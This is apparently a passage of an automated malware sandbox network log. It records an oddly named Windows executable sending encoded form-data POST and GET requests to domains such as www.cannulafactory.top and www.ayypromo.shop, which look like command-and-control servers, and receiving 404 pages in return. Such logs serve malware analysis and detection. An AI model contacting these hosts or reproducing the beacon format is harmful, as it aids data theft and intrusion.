                  Data Raw: 35 36 67 44 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 54 74 66 33 77 7a 4a 73 65 73 4a 52 42 47 6c 37 35 76 4b 45 51 73 61 52 63 53 67 2f 32 6e 43 69 41 3d
                  Data Ascii: 56gD=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GTtf3wzJsesJRBGl75vKEQsaRcSg/2nCiA=
                  Sep 4, 2024 09:37:27.457389116 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:27 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:27.457405090 CEST | 1236 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                  Sep 4, 2024 09:37:27.457416058 CEST | 1236 | IN | Data Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:27.457427979 CEST | 436 | IN | Data Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                  Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  27 | 192.168.2.4 | 49764 | 18.183.3.45 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:29.123729944 CEST | 10865 | OUT | POST /l90v/ HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.cannulafactory.top
                  Referer: http://www.cannulafactory.top/l90v/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 30 33 44 71 6b 66 2b 50 31 45 4c 4f 64 75 71 46 7a 4e 35 67 72 78 46 53 32 5a 50 65 79 35 38 6c 73 2f 69 66 43 2f 30 70 49 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 42 70 4f 6b 65 54 42 57 49 66 35 35 5a 47 71 70 73 53 37 6e 31 31 36 63 59 37 6e 57 72 6d 55 5a 79 32 73 53 42 68 54 78 4b 45 38 46 79 41 74 72 44 31 6d 6f 4f 76 36 6c 77 6c 4f 52 54 4b 36 33 63 4f 6e 4c 69 6d 2f 41 36 4e 38 30 45 58 6b 63 56 4c [TRUNCATED]
                  Data Ascii: 56gD=... [TRUNCATED]
                  Sep 4, 2024 09:37:30.109544039 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:29 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:30.109559059 CEST | 1236 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                  Sep 4, 2024 09:37:30.109569073 CEST | 448 | IN | Data Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:30.109941959 CEST | 448 | IN | Data Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:30.312815905 CEST | 1224 | IN | Data Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>
                  Sep 4, 2024 09:37:30.312969923 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:29 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  28 | 192.168.2.4 | 49765 | 18.183.3.45 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:31.677473068 CEST | 487 | OUT | GET /l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:32.553404093 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:32 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:32.553422928 CEST | 1236 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                  Sep 4, 2024 09:37:32.553436041 CEST | 1236 | IN | Data Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                  Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                  Sep 4, 2024 09:37:32.553447962 CEST | 436 | IN | Data Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                  Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  29 | 192.168.2.4 | 49766 | 176.57.64.102 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:45.760468006 CEST | 748 | OUT | POST /rgqx/ HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.ayypromo.shop
                  Referer: http://www.ayypromo.shop/rgqx/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 58 52 38 65 6c 49 30 49 6f 35 58 6b 4f 39 42 69 36 51 54 32 50 6c 45 57 64 4d 59 33 36 76 4a 36 77 3d 3d
                  Data Ascii: 56gD=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==
                  Sep 4, 2024 09:37:46.410078049 CEST | 1147 | IN | HTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=8Lbap9FlpnO2zWswl4ge; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:46 GMT
                  Date: Wed, 04 Sep 2024 07:37:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 738
                  Last-Modified: Fri, 30 Aug 2024 07:12:48 GMT
                  ETag: "2e2-620e151931c8a"
                  Accept-Ranges: bytes
                  X-Frame-Options: SAMEORIGIN
                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                  Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  30 | 192.168.2.4 | 49767 | 176.57.64.102 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:48.313395023 CEST | 768 | OUT | POST /rgqx/ HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.ayypromo.shop
                  Referer: http://www.ayypromo.shop/rgqx/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 42 33 4c 61 46 73 36 35 53 41 68 36 7a 64 31 44 39 4e 32 2f 73 4e 47 54 46 68 48 69 69 74 4b 66 55 3d
                  Data Ascii: 56gD=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=
                  Sep 4, 2024 09:37:49.057904005 CEST | 1147 | IN | HTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=A3kFss8PfXiNO5WLImal; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:48 GMT
                  Date: Wed, 04 Sep 2024 07:37:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 738
                  Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                  ETag: "2e2-620a674a57ae6"
                  Accept-Ranges: bytes
                  X-Frame-Options: SAMEORIGIN
